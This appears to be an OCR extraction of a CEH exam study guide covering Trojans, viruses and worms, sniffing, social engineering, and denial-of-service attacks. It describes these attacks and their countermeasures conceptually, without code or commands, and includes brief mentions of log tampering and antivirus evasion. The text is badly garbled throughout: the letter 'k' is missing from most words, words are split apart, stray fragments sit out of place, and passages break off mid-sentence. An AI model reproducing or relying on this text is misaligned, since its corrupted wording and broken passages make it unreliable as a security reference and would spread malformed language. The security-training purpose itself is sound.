Description: .jpg Description: NTFS Data Stream NTFS Alternate Data Stream (ADS) is a Windows hidden stream that contains metada ta for the file such as attributes, word count, author name, and access and modification time of the files A S has the ability to for data into existing files w D ithout changing or alterin g their functionality, size, or d isplay to file brow sing u tilitie s ADS allow an attac er to inject malicious code on a breached system and execute without being detected by the user What is Steganography? Steganography is the art and science of writing hidden messages in such a way th at no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity In digital steganography, electronic communications may include steganographic c oding inside of a transport layer, such as a docum file, im ent age file, program or protocol. Media files are ideal for steganography because of their large size. Subtle chan ges in a large file can easily go unnoticed. Steganalysis The goal of steganalysis is to identify suspected pac ages, determine whether or they have a payload encoded into them, and, if possible, recover that payload. not them

Description: .jpg Description: Covering Trac s Remove activity trac s Remove web activity trac s such as MRU (Most Recently Use d ), coo ies, cache, temporary files, and history Disable Auditing use Auditpol Tam log files m per odify event log files, server log files, and proxy log files b poisoning or flooding Close all remote connections to the victim machine Close any opened port y log Module 6 Trojans and Bac doors Study Guide Objectives: . What is a Trojan? . Overt and Covert Channels . Purpose of Trojans . Indications of a Trojan Attac . Common Ports Used By Trojans . How to Infect Systems Using Trojans Types of Trojans . How to Detect Trojans . Evading Anti-Virus Techniques . Trojan and Bac door Countermeasures

What is a Trojan? A Trojan is a remote access tool disguised as a different piece of software. Tro jans are set apart from other types of malware by the ability to phone home and allow a hac er to access a system in real time. Overt and Covert Channels O vert channels are those used in legitim ate data traffic such as http traffic ov er port 80. Covert channel communication ta es place over channels that are not intended for data traffic o r by hiding information that violates security policy in an overt channel. Purpose of Trojans Trojans allow for a hac er to control a compromised computer just as if they had physical access. They can be used to obtain sensitive information such as passwords or to further open computer for other attac s. Trojans are a multi-purpose tool of hac ers, used for m any different types of at s. An attac er may use a Trojan for a specific purpose or for going after specific inform ation. It also possible to use a Trojan for information gathering at first and then ma e the compromised system a vailable to other hac ers for use as a zombie or proxy.

tac is Indications of a Trojan Attac Almost any odd or unexpected behavior of a system could be lin ed to an infiltra by a Trojan. Many also have the ability to ill the tas m anager and m sconfig processes in order t o eep their processes from being disabled. The only guaranteed method of removing a Trojan is to reins tall the OS from nown good media. Common Ports Used By Trojans In the past Trojans used specific ports such as 31337 for Bac Orifice and 12345 Netbus. These ports can be found with a Google search. However, it is common to use common ports in covert manner as w ell. How to Infect Systems using Trojans When a Trojan is written, the malicious code is inserted into some sort of wrapp er that disguises the code as something benign li e a harmless jpg file or simple game. Once the Troja n is wrapped it can be placed on a website to be downloaded, emailed as an attachment, or placed on a U SB stic or cd. A CD /USB stic can be configured to autorun so that when an attac er intentiona lly leaves media for others to find, the person w finds the attac er s m ho edia w try to see w ill hat is that mysterious CD or USB stic and un now ingly install the attac er s Trojan. The possibilities are endless. for a tion


Types of Trojans Trojans can be used over many different protocols, are delivered in numerous way s, and can be written with pinpoint target accuracy. These many faces of Trojans represent the differe nt types listed in the CEH courseware. By Method: Trojans that use a specific method of communication or deployment: VNC HTTP/HTTPS ICMP Command Document Covert Channel Email FTP SPAM Trojans that have specific targets: Credit Card Trojans E-ban ing Trojans Mobile Trojans MAC OS X Trojans Shell Trojans that have a specific payload or create a payload: Data hiding (Encrypts data, sometimes ransoms the ability to decrypt the data to the victim, (Ransomware) Destructive Botnet Trojan Proxy Server Trojan Defacement Trojan How to Detect Trojans Detecting Trojans relies on having a baseline to compare suspicious behavior aga inst. Trojans can cause suspicious traffic on open ports, create registry entries, files, folders, or sh up as new installed programs. The CEH expects you to be familiar with these activities. Evading AntiVirus Techniques Anti-Malware software attempts to identify Trojans by wrapper signature or by co de signature. A Trojan writer can avoid leaving a signature by using a wrapper or Trojan that was selfwritten. By changing the code itself, it appears different, and accom plishes the goal of the Trojan. A Trojan can also be bro en up into multiple pieces for deployment and then assembled at the victim to evade detection.

ow Trojan and Bac door Countermeasures Trojan s are an insidious threat. The most innocent loo ing file or program could hiding a malicious payload. Trojans fit the idea of They are everyone, and they are no one. The only sure fire way of avoiding compromise is to not connect to the Internet. Even with this you could compromised but the Trojan would be unable to phone home . Common Trojans can be detected by Anti-m alware software, but a personally written one will not always be caught. Trojans may be detected by loo ing for suspicious port activity or files, but they m hide in com on port traffic or ay m inject into other files. Education about the ris Trojans pose increases awareness and decreases the li e lihood of dangerous behavior li e downloading files from the internet and viewing un nown email atta chments. However, Trojans may be hidden in critical components for business or on website are commonly used. be


s that Module 7 Viruses and Worms Study Guide Objectives: . Introduction to Viruses . Stages of Virus Life . How a Virus wor s . Virus Analysis . Types of Viruses . Writing a Simple Virus Program Computer Worms . Worm Analysis . What is a Sheep Dip Computer . Malware Analysis Procedure . Virus Detection Methods . Virus and Worm Countermeasures . Anti-Virus Tools . Penetration testing for Viruses Introduction to Viruses A virus is a self-replicating program that produces its own code by attaching co pies of itself into other executable codes. A true virus can spread from one computer to another (in some form of executable code) when its host is ta en to the target com puter; for instance because a user sent it over a netw or or the Internet, or carried it on a removable medium such as a floppy dis , CD, DVD, or USB drive. Some viruses affect computers as soon as their code is executed; other viruses l ie dormant until a predetermined logical circumstance is met Stages of Virus Life Design - Developing virus code using programming languages or construction its R eplication Virus replicates for a period of tim w e ithin the target system and t spreads itself Launch It gets activated with the user performing certain actions such as runnin infected program Detection A virus is identified as a threat infecting target system s Incorporation us Anti-virus software developers assimilate defenses against the vir hen g an

Elim ination U sers install anti-virus updates and elim inate the virus threats

How a Virus Wor s Infection phase the virus replicates itself and attaches to an .exe file in the system. Some viruses infect each time they are run and executed completely and others infect only whe n users trigger them, which can include a day, tim or a particular event. e, Attac Phase Some viruses have trigger events to activate and corrupt systems.

Some have bugs that replicate and perform activities such as file deletion and d ecrease the session s time. Sometimes they corrupt targets only after spreading completely as intended by th eir developers Virus Analysis Why are viruses created? To inflict damage on competitors Financial Benefits Research For Pran s Vandalism Cyber Terrorism Distribution of Political M essages Indications of a Virus attac Processes ta e more resources and time Computer slows when programs start Files and Folders are missing Hard Drive is accessed often Unable to load OS Anti-Virus alerts Browser window freezes How are Computers infected? Opening infected Email attachments Not running the latest anti-virus software Not updating and installing new versions of plug-ins Installing pirated software When a user accepts files and downloads without chec ing the source properly Projects Viruses Hoaxes - There are a lot of viruses out there. And then there are some v iruses that aren't really out there at all. Hoax virus warning messages are more than annoyances. After re peatedly becoming alarmed, only to learn that there was no real virus, computer users may get into the habit of ignoring all virus warning messages, leaving them especially vulnerable to the next real and truly destructive virus.

Types of Viruses System or Boot sector Viruses moves MBR to another location on the hard dis and copies itself to the original location of M BR. When system boots, virus code is executed first and th en control is passed to original MBR File Viruses File viruses infect executable files by inserting their code into s om e part of the original file so that the malicious code can be executed when the file is accessed. An overwri ting file virus is one that overw rites the original file entirely, replacing it w the m ith alicious code. F il infecting viruses have targeted a range of operating system, including Macintosh, UNIX, DOS, and Window s. Overwriting viruses cause irreversible damage to the files. Example: Loveletter, which operated as an email worm, file virus, and Trojan dow nloader, is a notorious exam of a file overw ple riting virus. Loveletter searched for certain file types overwrote them with its own malicious code, permanently destroying the contents of those files. Files af fected by an overwriting virus cannot be disinfected and instead must be deleted and restored from bac up M ultipartite Viruses program files at the same time. attem to attac both the boot sector and the executable o r pt


Example: Ghostball - It infected both executable .COM-files and boot sectors. Macro Viruses infect files created by Microsoft Word or Excel. Most are written in Visual Basic for Applications (VBA). Macro viruses infect templates or convert infected documents into template file, while maintaining their appearance of ordinary document files. Example: The Melissa Virus would spread on word processors Microsoft Word 97 and 2000 and also M icrosoft Excel 97, 2000 and 2003. It could mass-mail itself from e-mail cl ient Microsoft Outloo 97 or Outloo 98. Word If a Word document containing the virus, either LIST.DOC or another infected fil downloaded and opened, then the macro in the document runs and attempts to mass mail itself. W hen the m acro m ass-m ails, it collects the first 50 entries from the alias list address boo and sends itself to the e-m addresses in those entries. ail Cluster Viruses A type of virus that associates itself w the execution of pro ith grams by modifying directory table entries to ensure the virus itself w start w ill hen any program o computer system is started. If infected w a cluster virus it w appear as if every program on ith ill computer system is infected; however, a cluster virus is only in one place on the system. Stealth / Tunneling Virus this virus actively hides itself from anti-virus softw a by either mas ing the size of the file that it hides in or te porarily re oving itself from the infect ed m m file. It places a copy of itself in another location on the drive, replacing the infected file w an uni ith nfected one that it has stored on the hard drive. Encryption Viruses - this type of virus uses encryption to m as its code. It is encrypted with a different ey or each infected file. AV scanners cannot directly detect these types of vir using signature detection methods Polymorphic Code uses encryption to transform its code into an alternate, encryp ted form. To execute, a polym orphic virus m decrypt itself bac to its original form It w ust . then mutate with new encryption. To enable the polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or Encrypted Mutation Engine. A well-written polymorphic virus has no parts that stay the same on each infecti on. Metamorphic Viruses this virus actually ma es direct changes to its code, perman ently altering itself between each iteration. The code changes performed by a metamorphic virus are di rected by a metamorphic engine, which may itself be altered between iterations. This is th e counterpart to a polymorphic virus's polymorphic engine. The alterations in code carried out by a metamorphic virus ma e it much harder f or traditional signature-based antivirus programs to identify two separate iterations as one an same virus. Fortunately, the technical challenges involved in creating a functioning metamor phic virus are quite high, ma ing them very rare creations.

e, is


n the the




d the F O ile verw riting or C avity V iruses - A cavity virus attem pts to install itself i nside of the file it is in c g T is is d u to d . fe tin . h iffic lt o Most viruses ta e the easy way out when infecting files; they simply attach them selves to the end of the file and then change the start of the program so that it first points to the vir and then to the actual program code. Many viruses that do this also implement some stealth techniques s o you don't see the increase in file length when the virus is active in m ory. em A cavity virus, on the other hand, attem to be clever. pts Some program files, for a variety of reasons, have empty space inside of them. T empty space can be used to house virus code. A cavity virus attem to install itself in this e pts space while not damaging the actual program itself. An advantage of this is that the virus t does not increase the length of the program and can avoid the need for some stealth techniques. Example: LeHigh Virus Sparse Infector Viruses they w infect only occasionally (e.g. every tenth pro ill executed), or only files whose lengths fall within a narrow range. Companion / Camouflage Viruses - instead of modifying an existing file, these vi ruses create a new program which (un nown to the user) is executed instead of the intended program. On exit, the new program executes the original program so that things appear no On PCs this has usually been accomplished by creating an infected .COM file with the same name a s an existing .EXE file. Integrity chec ing antivirus softw are that only loo s for m odifications in exist ing files w fail to detect ill such viruses. Shell Viruses Virus code forms a shell around the target host program s code, ma i ng itself the original program and host code as its sub-routine Almost all boot program viruses are shell viruses File extension Viruses These viruses change the extensions of files. A counterme asure is to turn off Hide file extensions in Windows


his mpty hen


rmal. Add-on and Intrusive Viruses Add-on viruses append their code to the host code. Without ma ing any changes it will relocate the host code or insert its own code at the beginni ng. Intrusive viruses overwrite the host code partly or completely with viral code Transient and Terminate and Stay Resident Viruses The Transient virus will trans fer all controls of the host code to w here it resides, then it w select the target program to be m ill odi and corrupted.\ The Terminate and Stay virus (TSR) remains permanently in the memory during the entire wor session even after the target host s program is executed and terminated. The TSR can only be removed by rebooting the system.


Writing a Simple Virus Program There are many virus ma ers available to the public and most of them require no technical nowledge to create a virus.

Computer Worms Computer worms are malicious programs that replicate, execute, and spread across networ connections independently without human interaction. Most worms are created only to replicate and spread across a networ , consuming available computing resources; however, some worms carry a payload to damage the host system Attac ers can use worm payloads to install bac doors in infected computers, whic h in turn will ma e them susceptible to becoming zombies. As a zombie they will be part of a botnet used to carry out further cyber-attac s controlled by the worm author or whoever they sell the bot net to. Worm Analysis Confic er Worm The first variant of Confic er, discovered in early November 2008, propagated t hrough the Internet by exploiting a vulnerability in a networ service (MS08-067) on Windows 2000, W indows XP, Windows Vista, Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 Beta While Windows 7 may have been affected by this vulnerability, the Windows 7 Bet a was not publicly available until January 2009. Although Microsoft released an emergency out-of-ba patch on October 23, 2008 to close the vulnerability, a large number of Windows PCs (estimated at remained unpatched as late as January 2009. A second variant of the virus, discovered in December 2008, added the ability t propagate over LANs through removable media and shares. Researchers believe that these were dec isive factors in allowing the virus to propagate quic ly: by January 2009, the estimated number o infected computers ranged from alm 9 m ost illion to 15 m illion. Recent estimates of the number of infected computers have been notably more dif ficult because of changes in the propagation and update strategy of recent variants of the virus.

nd 30%)

What is a Sheep Dip Computer? A sheepdip is the process of chec ing physical media, such as floppy dis s or CD -ROMs, for viruses before they are used in a computer. Typically, a computer that sheep dips is used only for that process and nothing else and is isolated from the other computers, meaning it is connected to the networ . M sheepdips use at least two different antivirus programs in ord er to ost increase effectiveness. The goal of sheep dipping is to bloc viruses from entering syste rather than waiting until they m anifest on user wor stations at which time they will have already do their damage Anti-Virus Sensor Systems Anti-virus systems have a collection of computer software pac ages that detect a analyze malicious code threats such as viruses, worms, and Trojans. They are used along with sheep nd


ms ne

dip computers

Description: .jpg Description: Malware Analysis Procedure Preparing Test bed Install VMWare or Virtual PC on the system Install guest OS into the virtual machine Isolate the system from the networ Disable shared folders and guest isolation Copy the malware over to the guest OS Note - At least two machines should be used. One machine is for hosting the mali cious binary (victim m achine) and the other is for baselining and sniffing the netw traffic (sniff or machine). They should be networ ed in such a way that each of them is able to sniff the other's networ traffic. Malware Analysis Procedure


Virus Detection Methods Scanning Once a virus has been detected, it is possible to write scanning programs that l oo for signature string characteristics of the virus Integrity Chec ing These products wor by reading the entire dis and recording integrity data that acts as a signature for the files and system sectors Interception The interceptor monitors the operating system requests that are written to the d is

Description: .jpg Description: Virus and Worm Countermeasures Install anti-virus software that detects and removes infections as they appear G enerate an anti-virus policy for safe com puting, and distribute it to the staff Pay attention to the instructions while downloading files or any programs from t he Internet U pdate the anti-virus softw are on a m onthly basis, allow it to identify and c ing new bugs Avoid opening the attachments received from an un nown sender as viruses spread via e-mail attachments The possibility of virus infection m corrupt data, thus regularly m ay aintain dat -ups Schedule regular scans for all drives after the installation of anti-virus softw are Do not accept dis s or programs without scanning them with anti-virus software f irst a bac lean

A ntiVirus Tools AVG Antivirus BitDefender Kaspers y Trend Micro Norton AntiVirus Avast

Penetration Testing for Viruses Install Anti-Virus on the networ infrastructure and on the end-user s system Update Anti-Virus to update the virus database of the newly identified viruses Scan the system which helps to repair damage or delete files infected with virus es If the virus is not rem oved, go in to safe m ode and delete infected files manual ly If any suspicious process, registry entries, startup program or service is disco vered, chec associated executable files Chec the startup programs and determine if all the programs can be recognized w nown functionalities Chec the data files for m odification or m anipulation by opening several files a comparing their hash value with a pre-computed hash ith


Description: .jpg Description:

Modu le 8 Sniffers Study Guide Objectives: . Lawful Intercept . Sniffing Threats . Types of Sniffing . Hardware Protocol Analyzers MAC Attac s . DHCP Attac s . ARP Poisoning Attac s . Spoofing Attac . Sniffing Tools . Countermeasures Lawful Intercept Lawful Intercept is the policy of allowing a Law Enforcement Agency (LEA) to obt ain records of data transmissions across traditional communication lines through wiretaps, and also through internet services for voice and data w proper judicial order. This inform ith ation is prov to an LEA after such an order has been received by the service provider. Sniffing Threats M onitoring traffic in a networ environm ent is called Sniffing. Using hardware o r software to capture traffic a hac er can read any data found in plaintext. This data can ta e the fo rm of w traffic, em eb ail traffic, passw ords transm itted across protocol using plain text, and other traff ic. Sniffing relies on having physical access to a networ . Types of Sniffing Passive Sniffing Passive sniffing is monitoring pac ets on a networ segment that is not switched bridged and can be seen by all machines on that segment. Hubs are outdated which ma es them a rare find, but it is still possible to sniff wireless networ s or networ s with compromised switches. Any n etwor card set to promiscuous mode connected to an open networ segment can read all the connected devices traffic because the traffic is not switched and sends the same data to all ports. Active Sniffing In today s switch-based networ environments, a hac er injects pac et into networ traffic for a desired effect. This is active because you are actually causing a change instead of watc what occurs. or


hing Hardware Protocol Analyzers OSI Model Vulnerable Protocols: Telnet HTTP SMTP NNTP POP FTP IMAP These protocols are vulnerable because they send some or all information in plai n text. This traffic is capable of being compromised at the Data Lin Layer (Layer 2 on the OSI model) w does not adhere to the restrictions of the upper levels. This a llow for all of th traffic alon s e these protocols to be compromised without issues in the higher OSI model layers. Hardware protocol analyzers are special equipment that monitor networ traffic a cross a cable without altering it and allow for precise inform ation reading about that traffic. Using a piece of hardware li e this on the SPAN port of a switch, which is setup to receive of copy of pac ets sent across the switch, allows for capture and m onitoring of all the con nections to that switch. MAC Attac s MAC Flooding This attac occurs when a switch is bombarded with requests with different sourc MAC addresses. The Content Addressable Memory (CAM) table is usually of a small, fixed size; when i reaches its maximum the sw itch begins to broadcast traffic to all connections, li e a hub. To defend against this some switches have the ability to limit the number of MAC addresses that can be learned on ports connected to end stations. An AAA (Authentication, Authorization, and Accounting) server can be used to aut henticate discovered MAC addresses as well e t

hich g DHCP Attac s Dynamic Host Configuration Protocol (DHCP) is used to allow new hosts to connect to a networ easily, because of this functionality it can be insecure. It is im portant to rem ber th em attac s against DHCP ta e advantage of its functionality because it is perm itted but in a m anner that not intended. DHCP Starvation This is a Denial of Service attac against a DHCP implementation. The attac er s ends out requests for an entire DHCP scope instead of just one address, eeping anyone else from connecti ng to the server. Rogue DHCP An attac er can run a DHCP for the same scope as the legitimate server, causing users to connect to the rogue. This server can then be used to eavesdrop on the users or intercept reque and send them to m alicious sites. DHCP attac countermeasures Counter DHCP attac s can be done at the switch level by requiring DHCP traffic t o be restricted by port and to only travel to trusted servers. ARP Poisoning Attac s The Address Resolution Protocol maps an IP address to a physical machine address that is recognized on the local networ . An ARP table is created in networ ed devices containing this information. When a MAC address is not found in the table an ARP request is broadcast. When an answe r is found the machine updates the table with the address pair allowing communication. ARP spoofing occurs when these pac ets are forged. This can then fill the ARP ta ble, similar to a MAC Flood attac . ARP spoofing can also be used to Poison the ARP table with fictiti entries to enable snooping. Using these fa e ARP messages an attac er can divert communication to compromise a user or system. The ARP table can be bound to ports on a switch at the switch level to counter A poisoning.

at was



RP Spoofing Attac s MAC Spoofing Attac s When an attac er can sniff out MAC addresses, they can use that information to s poof or duplicate the MAC in question and intercept or use a legitimate users MAC address to receive t hat users traffic. If the M address is used for networ identification, the attac er now has acce ss to AC what the legitimate user had access to by bypassing Access Control Lists on Routers and Servers. Usi spoofed MAC addresses is also used in other networ traffic attac s li e SYN floods and the of Death. Countering spoofing attac s involves the use of binding tables and chec ing that addresses do not change IPs on the switch they are connected to. DNS Poisoning The Domain Name system used to identify names human use into numbers computers u se can be tric ed by spoofing as well. A DNS server can be tric ed into accepted false inf ormation, poisoning the cache of names that are used to answer a client s request for a website or networ resource. When the user requests a website from a spoofed DNS server the user is sent to t he location the attac er has designated on the false server. In order to defend against these attac s it is recommended that you resolve all requests locally, and use only trusted outside DNS servers as well. Configure firewalls to restrict ex ternal DNS loo ups so that users are forced to eep requests internal. DNSSEC or Secure DNS uses cryptograp hic electronic signatures signed w a trusted public ey certificate to confirm authentic tra ffic, ith im plem enting this protocol mitigates spoofing threats. Sniffing Tools Wireshar Kismet Snort DNS

ng Ping MAC

Countermeasures Sniffing w hardw ith are requires physical access to the traffic that is being tar geted. By securing the physical location and access to networ equipment, a pac et capture device canno t be installed. Sniffing depends on traffic being in plaintext, encryption ring. eeps this from occur

SSL and IPSec (Internet Protocol Security) are examples of encryption solutions.

Module 9 Social Engineering

Study Guide Objectives: . What is Social Engineering? . Why is Social Engineering effective? . Phases in a Social Engineering attac . Common targets of Social Engineering . Types of Social Engineering . Common Intrusion Tactics and Strategies for Prevention . Social Engineering through Impersonation on Social Networ ing Sites . Ris s of Social Networ ing to Corporate Networ s . Identity Theft . Social Engineering Countermeasures . Social Engineering Pen Testing

What is Social Engineering? Social engineering is the art of manipulating people into performing actions or divulging confidential information Social engineers prey on people that are careless about protecting confidential information Why is Social Engineering Effective? There is no specific software or hardware for defending against a social enginee ring attac Security policies are as strong as their wea est lin , and humans are the most s usceptible factor It is difficult to detect social engineering attem pts There is no method to ensure complete security from social engineering attac s Phases in a Social Engineering Attac Research Researching a target company consists of dumpster diving, websites, employees, c ompany tours, etc. Develop In this phase relationships are built with selected employees, impersonations ma developed as well. Exploit Collect sensitive account inform ation, financial inform ation, and current techno logies Command Injection Attac s Online- Contacting employees anonymously over the Internet and persuading them t o provide information Telephone Requesting information usually through impersonating a legitimate user , either to access the telephone system itself or to gain remote access to compute r systems y be Personal Approaches In personal approaches, attac ers get information by as ing for it d c ire tly

Common Targets of Social Engineering Receptionists/Help Des Personnel Technical Support Executives System administrators Vendors of the target organization Users and clients Types of Social Engineering Human-based Gathers sensitive information by interaction Attac s of this category exploit trust, fear, and the helping nature of hum ans An attac er can pose as a legitimate end user, a technical support person, or es sentially anyone that they feel will persuade someone to reveal information. Eavesdropping Unauthorized listening of conversations or reading of messages Interception of any form such as audio, video, or written Shoulder Surfing Attac ers can loo over someone s shoulder or view a target with binoculars to gai n confidential information Dumpster Diving Searching for useful documents or any other information in trash bins, printer s tations, or someone s des Tailgating An unauthorized person enters a secured area by following closely behind an auth orized person to gain access without the need for a ey. This is done without the consent of the autho rized user

Piggybac ing Essentially the same principle as tailgating, however, the unauthorized person h as consent in this case. The authorized person allows an unauthorized individual to gain access with thei r credentials Reverse Social Engineering This is when the attac er creates a persona who appears to be in a position of a uthority so that employees will as him for information, rather than the other way around These attac s involve sabotage, mar eting, and tech support Computer-based Social engineering carried out with the help of computers Ups C be used to tric users into clic ing a lin that redirects them to fa e w an ebs as ing for personal information, or downloads malicious programs such as eyloggers,Trojans, or Spyw are Phishing An illegitim ate em falsely claim ail ing to be from a legitim ate site attem pts to acquire the user s personal or account information Social Engineering using SMS Insider Attac s Spying If a competitor wants to cause damage to your organization, steal critical secre ts, or put you out of business, they just have to find a job opening, prepare someone to pass the inte rview, have that person hired, and they w be in the organization ill Revenge It ta es only one disgruntled person to ta e revenge and your company is comprom ised -%60 of attac s occur from behind the firewall ites Pop- -an inside attac is easy to launch and is difficult to prevent

Common Intrusion Tactics and Strategies for Prevention Area of Ris Attac er s Tactics Combat Strategy Phone (Help Des ) Impersonation and Persuasion Train employees never to reveal information over the phone Building Entrance Unauthorized Physical Access ID Badge enforcement, training, security officers Office Shoulder Surfing Frosted Glass, Not allowing others to view you typing Phone (Help Des ) Impersonating Help des calls Assign a PIN to employees for help des calls Office Wandering strangers Escort all guests Mail Room Insertion of forged memos Loc and monitor mail room Machine room/ Phone closet Attempting to gain access, remove Keep these spaces l oc ed equipment, attach rogue wireless access points or protocol analyzers Phone and PBX Stealing phone access Control overseas and long distance calls, trace calls, and refuse transfers Social Engineering through Impersonation on Social Networ ing Sites Malicious users can gather information by impersonating others on social networ s. eep updated inventories Staff This inform ation can lead to an attac er creating large netw s of friends to e or xtract information using social engineering techniques They can also use this information to carry out other forms of social engineerin g outside of the social networ

Ris s of Social Networ ing to Corporate Networ s Data Theft A social networ ing site is an enormous database accessed by many individuals, i ncreasing the ris of inform ation exploitation Involuntary Information In the absence of a strong policy, employees may un nowingly post sensitive data about their company on social networ ing Targeted Attac s Information on social networ ing sites could be used for preliminary reconnaissa nce in a targeted attac Networ Vulnerability All social networ ing sites are subject to flaws and bugs that m lead to vulne ay rabilities in the com pany s networ Identity Theft Identity theft is a form of fraud in which someone pretends to be someone else b assuming that person's identity, typically in order to access resources or obtain credit and o ther benefits in that person's name Theft of Personal Information Identity theft occurs when someone steals your name and other personal informati on for fraudulent purposes Loss of Social Security Numbers It is a crime in which an imposter obtains personal information, such as Social Security or driver s license numbers y Easy Methods Cyberspace has m ade it easier for an identity thief to use stolen inform ation fo fraudulent purposes r

Social Engineering Countermeasures Policies Good policies and procedures are ineffective if they are not taught and reinforc the employees After receiving training, employees should sign a statement ac nowledging that t understand the policies and the ramifications for not upholding them Training An efficient training program should consist of all security policies and variou methods to increase awareness on social engineering. Being aware of the psychological techniques peo tend to succumb to gives users empowerment. They recognize these techniques in use in the future Operational Guidelines Ensure security of the sensitive information and authorized use of resources Classification of Information Categorize the inform ation as top secret, proprietary, for internal use only, fo r public use, etc. Bac ground Chec s and Proper Termination Procedures Insiders with criminal bac grounds and terminated employees are easy targets for procuring information Access Privileges There should be administrator, user, and guest accounts with proper authorizatio n Proper Incident Response Time There should be proper guidelines for reacting to a social engineering attempt Factor Authentication Twos ple ed by hey Instead of fixed passwords, use two-factor authentication for high-ris networ services such as VPN s, modem pools, and wireless networ s Anti-Virus/Anti-Phishing Defenses Use multiple layers of anti-virus defenses at end-user des tops and mail gateway s to minimize social engineering attac s

Change Management Change management is a structured approach to transitioning individuals, teams, and organizations from a current state to a desired future state A documented change-management process is highly effective and is proactive. An employeedependent, undocumented approach is reactive and could harm productivity Social Engineering Pen Testing Gaining Authorization Obtain m anagem ent s explicit authorization and details that will help in defining scope of a pen-test. These details may consist of a list of departments, individual employees to targ et, and the level of physical intrusion allowed Intelligence Gathering Collect em addresses, and contact details of the target organization and its ail human resources (if not already provided) using techniques such as dumpster diving, email guessing, web searches, and email spider tools. Try to extract as m uch inform ation as possible using footprinting techniques Create a Script Based on the collected information, create believable impersonations, storylines , etc. to attac the target Use Emails If management approves social engineering via email, use phishing techniques, im personation, send malicious attachments. You are assessing how email attac s are treated by the or ganization and how much confidential information can be obtained the Pic Up the Phone Call a target posing as a colleague, an important customer, tech support, or ref an important person in the organization to gain inform ation er to

In Person Be creative and convincing. Befriend employees, pose as an external auditor, thr on some coveralls and impersonate a technician. These are all believable characters to play. Use tailgating to gain physical access, create fa e badges. Once inside eavesdrop and shoulder surf. Meet employees in the brea room and st ri e up a conversation. Documentation Document EVERYTHING The responses from the users, security staff, and anyone you come into contact w ith. Video ma es for a convincing form of documentation. What information was obtained and what vulnerabilities allowed you to collect co nfidential information There is never a problem with too much detail in a report All of this documentation is important to management as it helps to improve thei r security posture ow

Module 10 Denial of Service Study Guide Objectives: . What are DoS and DDoS attac s? . Symptoms of a DoS attac . DoS Attac Techniques . Botnets . Detection Techniques . Dos/DDoS Attac Countermeasures . DoS Attac Penetration Testing

What are DoS and DDoS Attac s? Denial of Service refers to m ing a web site or service unavailable to users fo a period of time. A DoS attac becomes a war of attrition. Does the attac er have more bandwidth or CPU power than the victim? Websites are a common target for DOS attac s. If enough users (real or machine created) put a load on a website, then the webserver tas ed with handling the information becomes slowe r or unable to create new connections to provide information. The website code itself may require too much processing power. Depending on the attac , a hac er may be able to use all of the bandwidth available to the webserver. One common method of DOS is a Distributed Denial of Service, where the attac er has multiple computers under their control to distribute the attac . These attac s often occu r using botnets, a set of computers that are controlled li e robots to do a controller s bidding. They can b directed with simple commands and they are frequently used without the actual owner s nowledge. Symptoms of a DoS Attac An attac er ta es up available resources using specific vulnerabilities or by us ing a Distributed attac through another networ such as a Botnet. Symptoms may include a website being ed down, a large influx of spam or an inability to access the internet. C , onnection m onitor ing features in routers or the use of a separate device w trigger alerts for this type of traffic. These ill alerts are often configured to allow the conceptual right amount of alerts that the networ admin is comfortab le with, no regard is given to the actual netw or traffic w hen they are set. This creates a false s ense of security. DoS and DDoS wor by flooding a computer or networ with specifically crafted qu eries or by just using a larger amount of bandwidth to connect to the target than the target has availa ble to respond to the ra


requests. A Web Stress test, such as used by Massively Multiplayer Online game developers, functions the same way in a legitimate, controlled fashion to show what the brea ing point is of a set of servers. M alicious hac ers can use the same tools and just ignore the brea ing point to bring down the target.

Who uses DoS/DDoS Cyber Criminals are increasingly being associated with organized crime syndicate s. These organizations provide a hierarchical setup to use various activities and technical s ills to m sophisticated attac s. Organized groups create and rent botnets, offer services such as malware writing , hac ing ban accounts, or create Denial of Service attac s against targets for a price. Accor to Verizon s 2010 Data Breac Investigations Report, the majority of breac es were drivien by orga groups and 70% of data stolen was the wor of crim inals outside the victim organization. Organi zed hac tivism is a matter of concern for national security agencies.


ding nized

DoS Attac Techniques Bandwidth Attac All bandwidth is used up by an attac . This leaves none for legitimate users. Th is type of attac is normally conducted by Distributed Denial of Service. Some hosting companies allo ramping up m ore bandwidth during an attac , but the cost for this service can be prohibitiv many companies. Service Request Floods A service request flood wor s by exhausting server resources. Requests are made from a valid source, or a spoofed valid source, with the intention using up TCP connections. When the th reshold for connections is met, the server can no longer answer requests, denying the servic e to other users. SYN attac An attac exploits the three way handsha e by creating spoofed SYN pac ets. This

w for e for

attac causes the server to send ACK s to the fa e source of the SYN pac ets. This floods the source sys that was spoofed with ACK traffic, eeping this system from responding to other traffic.

tem SYN Flooding SYN Flooding wor s the same as SYN attac , but instead of sending ACKs to a targ et, it uses the half open connections to overload the listening queue on the server. This eeps the se rver s ability to respond offline for a period of time depending on implementation. ICMP Flood attac A large number of pac ets with fa e source addresses are sent to target. Whether the target accepts the ping or not the ping traffic overloads the target. This attac is also now n Smurf Attac . Peer to Peer attac s Using p2p clients and the DC++ protocol an attac er can instruct other computers on the p2p networ to disconnect and connect to a website. Given the massive amount of users connected to some of these networ s this creates a DoS attac . Permanent Denial of Service This attac is also referred to as Phlashing. An attac er sends a fa e auses a user or system to load software to damage the hardware or bric the system. update that c

as a

Application Level Flood attac s These attac s occur higher on the OSI model than most flood attac s. Using appli cations such as email clients or w logins an attac exploits the program itself to create a flood of eb traffic. These can also occur with programs using a database by using crafted queries to jam access to t database. Botnets Botnets are huge networ s that can be commanded to underta e actions on behalf o f the Bot herder . Botnets are created by passing the controlling software to users and networ s by several means. Trojans are a leading cause, such as Shar and Poison Ivy Command and Control, ICQ, IRC Older internet communications such as ICQ and IRC are very lightweight and able to be used to relay commands to a zombie computer in a botnet. Internet Relay Chat is built in


